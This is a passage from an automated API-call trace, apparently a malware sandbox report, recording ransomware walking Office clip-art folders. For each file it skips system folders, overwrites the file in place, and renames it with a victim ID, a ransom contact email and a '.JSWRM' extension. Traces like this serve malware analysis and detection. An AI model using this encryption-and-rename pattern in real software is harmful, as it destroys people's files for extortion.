lpMultiByteStr="SY01563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01563_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.482] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5060) returned 1 [0098.482] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13c0) returned 0x205850 [0098.482] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13c0, lpOverlapped=0x0) returned 1 [0098.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.484] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13c0, lpOverlapped=0x0) returned 1 [0098.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.484] CloseHandle (hObject=0x314) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0098.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0098.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0098.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0098.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01563_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01563_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01563_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0098.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.486] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01572_.WMF", cAlternateFileName="")) returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2=".") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="..") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="...") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="windows") returned -1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="recovery") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="perflogs") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="documents and settings") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="system volume information") returned -1 [0098.486] lstrcmpiW (lpString1="SY01572_.WMF", lpString2="msocache") returned 1 [0098.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0098.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01572_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01572_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01572_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0098.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0098.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01572_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01572_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01572_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0098.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0098.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0098.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01572_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01572_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.522] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3304) returned 1 [0098.522] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce0) returned 0x23fc98 [0098.522] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xce0, lpOverlapped=0x0) returned 1 [0098.524] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.524] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xce0, lpOverlapped=0x0) returned 1 [0098.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.524] CloseHandle (hObject=0x314) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0098.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0098.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0098.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0098.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0098.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.524] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01572_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01572_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01572_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01572_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.526] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x338e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01590_.WMF", cAlternateFileName="")) returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2=".") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="..") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="...") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="windows") returned -1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="recovery") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="perflogs") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="documents and settings") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="system volume information") returned -1 [0098.526] lstrcmpiW (lpString1="SY01590_.WMF", lpString2="msocache") returned 1 [0098.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01590_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01590_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01590_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0098.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01590_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01590_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01590_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0098.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01590_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01590_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.527] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13198) returned 1 [0098.527] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3380) returned 0x24d210 [0098.527] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3380, lpOverlapped=0x0) returned 1 [0098.529] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.529] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3380, lpOverlapped=0x0) returned 1 [0098.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.529] CloseHandle (hObject=0x314) returned 1 [0098.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0098.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0098.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0098.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0098.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0098.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01590_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01590_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01590_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01590_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.531] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TAIL.WMF", cAlternateFileName="")) returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2=".") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="..") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="...") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="windows") returned -1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="recovery") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="perflogs") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="documents and settings") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="system volume information") returned 1 [0098.531] lstrcmpiW (lpString1="TAIL.WMF", lpString2="msocache") returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAIL.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAIL.WMF", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAIL.WMF", lpUsedDefaultChar=0x0) returned 8 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAIL.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAIL.WMF", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAIL.WMF", lpUsedDefaultChar=0x0) returned 8 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0098.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TAIL.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tail.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.532] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2230) returned 1 [0098.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x20c6c0 [0098.532] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0098.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 